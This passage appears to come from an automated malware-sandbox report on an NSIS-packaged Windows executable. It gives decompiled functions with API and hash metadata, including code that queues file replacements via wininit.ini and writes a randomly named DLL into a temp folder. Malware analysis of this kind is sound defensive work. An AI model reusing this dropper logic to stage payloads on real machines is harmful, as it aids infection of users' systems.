					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}
















                                        0x00405715
                                        0x0040571c
                                        0x00405720
                                        0x00405729
                                        0x0040572d
                                        0x00405879
                                        0x00405879
                                        0x00000000
                                        0x00405879
                                        0x0040572d
                                        0x00405739
                                        0x0040574f
                                        0x00405777
                                        0x00405782
                                        0x00405786
                                        0x004057a9
                                        0x004057b1
                                        0x004057bd
                                        0x004057d4
                                        0x004057da
                                        0x004057df
                                        0x00000000
                                        0x00000000
                                        0x004057ee
                                        0x004057f0
                                        0x004057fd
                                        0x00405801
                                        0x00405872
                                        0x00405873
                                        0x00000000
                                        0x0040581d
                                        0x0040582a
                                        0x0040588f
                                        0x00405896
                                        0x0040583d
                                        0x0040583d
                                        0x0040583f
                                        0x00405848
                                        0x00405853
                                        0x00405865
                                        0x0040586c
                                        0x00000000
                                        0x0040586c
                                        0x00405898
                                        0x0040589e
                                        0x004058a0
                                        0x004058af
                                        0x004058af
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004058a2
                                        0x004058a2
                                        0x004058a4
                                        0x004058a7
                                        0x004058ab
                                        0x00000000
                                        0x004058a2
                                        0x00405835
                                        0x0040583a
                                        0x00000000
                                        0x0040583a
                                        0x00405801
                                        0x00405751
                                        0x0040575c
                                        0x00405765
                                        0x00405769
                                        0x00000000
                                        0x00000000
                                        0x00405769
                                        0x00405883

                                        APIs
                                          • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                          • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                          • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                        • GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
                                        • GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
                                        • wsprintfA.USER32 ref: 004057A0
                                        • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                        • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                        • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                        • GlobalFree.KERNEL32 ref: 0040586C
                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                          • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                          • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                        • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                        • API String ID: 3633819597-1342836890
                                        • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                        • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                        • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                        • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f88;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                        0x0040100a
                                        0x00401039
                                        0x00401047
                                        0x0040104d
                                        0x00401051
                                        0x0040105b
                                        0x00401061
                                        0x00401064
                                        0x004010f3
                                        0x00401089
                                        0x0040108c
                                        0x004010a6
                                        0x004010bd
                                        0x004010cc
                                        0x004010cf
                                        0x004010d5
                                        0x004010d9
                                        0x004010e4
                                        0x004010ed
                                        0x004010ef
                                        0x004010ef
                                        0x00401100
                                        0x00401105
                                        0x0040110d
                                        0x00401110
                                        0x00401112
                                        0x00401118
                                        0x0040111f
                                        0x00401126
                                        0x00401130
                                        0x00401142
                                        0x00401156
                                        0x00401160
                                        0x00401165
                                        0x00401165
                                        0x00401110
                                        0x0040116e
                                        0x00000000
                                        0x00401178
                                        0x00401010
                                        0x00401013
                                        0x00401015
                                        0x0040101f
                                        0x0040101f
                                        0x00000000

                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32 ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32 ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                        • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                        • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                        • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004059E1, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 180stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 88%
                                        			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x7a2fb8;
				_t35 = 0x7a1f20;
				_t79 = 0x7a1f20;
				if(_a4 - 0x7a1f20 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x7a1f20;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x7a4000;
							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
						} else {
							E0040591D(_t79,  *0x7a2f84);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405BFB(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059BF(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x7a3004;
						if( *0x7a3004 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E0040521C(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059BF(_a4, _t35);
			}






















                                        0x004059e8
                                        0x004059ef
                                        0x00405a00
                                        0x00405a00
                                        0x00405a0a
                                        0x00405a0c
                                        0x00405a13
                                        0x00405a1b
                                        0x00405a21
                                        0x00405a24
                                        0x00405a24
                                        0x00405bd5
                                        0x00405bd5
                                        0x00405bd9
                                        0x00405bdc
                                        0x00000000
                                        0x00000000
                                        0x00405a31
                                        0x00405a37
                                        0x00000000
                                        0x00000000
                                        0x00405a3d
                                        0x00405a3e
                                        0x00405a41
                                        0x00405bc8
                                        0x00405bd2
                                        0x00405bd4
                                        0x00405bd4
                                        0x00405bca
                                        0x00405bcc
                                        0x00405bce
                                        0x00405bcf
                                        0x00405bcf
                                        0x00000000
                                        0x00405bc8
                                        0x00405a47
                                        0x00405a4b
                                        0x00405a5b
                                        0x00405a62
                                        0x00405a65
                                        0x00405a68
                                        0x00405a6a
                                        0x00405a6d
                                        0x00405a70
                                        0x00405a71
                                        0x00405a75
                                        0x00405a78
                                        0x00405b73
                                        0x00405b77
                                        0x00405ba7
                                        0x00405bab
                                        0x00405bb0
                                        0x00405bb4
                                        0x00405bb4
                                        0x00405bb9
                                        0x00405bbf
                                        0x00405bc1
                                        0x00000000
                                        0x00405bc1
                                        0x00405b79
                                        0x00405b7c
                                        0x00405b91
                                        0x00405b98
                                        0x00405b7e
                                        0x00405b85
                                        0x00405b85
                                        0x00405ba0
                                        0x00405ba3
                                        0x00405b6b
                                        0x00405b6c
                                        0x00405b6c
                                        0x00000000
                                        0x00405ba3
                                        0x00405a7e
                                        0x00405a82
                                        0x00405a87
                                        0x00405a88
                                        0x00405a8b
                                        0x00405a96
                                        0x00405a99
                                        0x00405a9c
                                        0x00405ab5
                                        0x00405ab8
                                        0x00405ae5
                                        0x00405ae8
                                        0x00405af8
                                        0x00405afb
                                        0x00000000
                                        0x00000000
                                        0x00405b03
                                        0x00000000
                                        0x00405b03
                                        0x00405af0
                                        0x00000000
                                        0x00405af0
                                        0x00405aca
                                        0x00405acf
                                        0x00405ad2
                                        0x00000000
                                        0x00000000
                                        0x00405ade
                                        0x00000000
                                        0x00405a9e
                                        0x00405aae
                                        0x00405b09
                                        0x00405b09
                                        0x00405b0c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405b0c
                                        0x00405a8d
                                        0x00405a8d
                                        0x00405b0e
                                        0x00405b0e
                                        0x00405b15
                                        0x00405b19
                                        0x00405b19
                                        0x00405b1a
                                        0x00405b1d
                                        0x00405b29
                                        0x00405b2f
                                        0x00405b31
                                        0x00405b50
                                        0x00405b50
                                        0x00000000
                                        0x00405b50
                                        0x00405b37
                                        0x00405b40
                                        0x00405b43
                                        0x00405b48
                                        0x00405b4c
                                        0x00000000
                                        0x00000000
                                        0x00405b53
                                        0x00405b53
                                        0x00405b53
                                        0x00405b57
                                        0x00405b5a
                                        0x00405b5c
                                        0x00405b60
                                        0x00405b66
                                        0x00405b66
                                        0x00405b60
                                        0x00000000
                                        0x00405b5a
                                        0x00405a8b
                                        0x00405be2
                                        0x00405bec
                                        0x00405bf8
                                        0x00405bf8
                                        0x00000000

                                        APIs
                                        • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                        • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                        • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                        • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078E938,00789938), ref: 00405BBA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                        • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                        • API String ID: 4227507514-3711765563
                                        • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                        • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                        • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                        • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100memoryfilestringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 32%
                                        			E004026FA() {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405538(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054CC(E004059BF("C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll", "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a018;
				} else {
					_push(0x40a018);
					E004059BF();
				}
				E00405BFB(_t55);
				_t28 = E00405690(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x7a2f8c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E004030FF(_t48);
						E004030CD(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							_push( *(_t60 - 0x1c));
							_push(_t58);
							_push(_t48);
							_push( *((intOrPtr*)(_t60 - 0x20)));
							E00402EBD();
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						_push(_t48);
						_push(_t48);
						_push( *(_t60 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a018;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}














                                        0x004026fb
                                        0x00402707
                                        0x0040270a
                                        0x00402711
                                        0x00402712
                                        0x00402737
                                        0x0040273c
                                        0x00402714
                                        0x00402719
                                        0x0040271a
                                        0x0040271a
                                        0x00402742
                                        0x0040274f
                                        0x00402757
                                        0x0040275a
                                        0x00402760
                                        0x0040276e
                                        0x00402773
                                        0x00402777
                                        0x0040277a
                                        0x00402783
                                        0x0040278f
                                        0x00402793
                                        0x00402796
                                        0x00402798
                                        0x0040279b
                                        0x0040279c
                                        0x0040279d
                                        0x004027a0
                                        0x004027bf
                                        0x004027ac
                                        0x004027b4
                                        0x004027b7
                                        0x004027bc
                                        0x004027bc
                                        0x004027c6
                                        0x004027c6
                                        0x004027d8
                                        0x004027df
                                        0x004027e5
                                        0x004027e6
                                        0x004027e7
                                        0x004027ea
                                        0x004027f1
                                        0x004027f1
                                        0x004027f7
                                        0x004027fd
                                        0x004027fd
                                        0x00402807
                                        0x00402808
                                        0x0040280c
                                        0x0040280e
                                        0x00402814
                                        0x00402814
                                        0x0040281b
                                        0x004021e8
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                        • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                        • GlobalFree.KERNEL32 ref: 004027C6
                                        • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                        • GlobalFree.KERNEL32 ref: 004027DF
                                        • CloseHandle.KERNEL32(?), ref: 004027F7
                                        • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                        • API String ID: 3508600917-2932325099
                                        • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                        • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                        • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                        • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404D62, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E00404D62(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
					}
					_t26 = lstrlenA(0x79ed60);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x79ed60;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
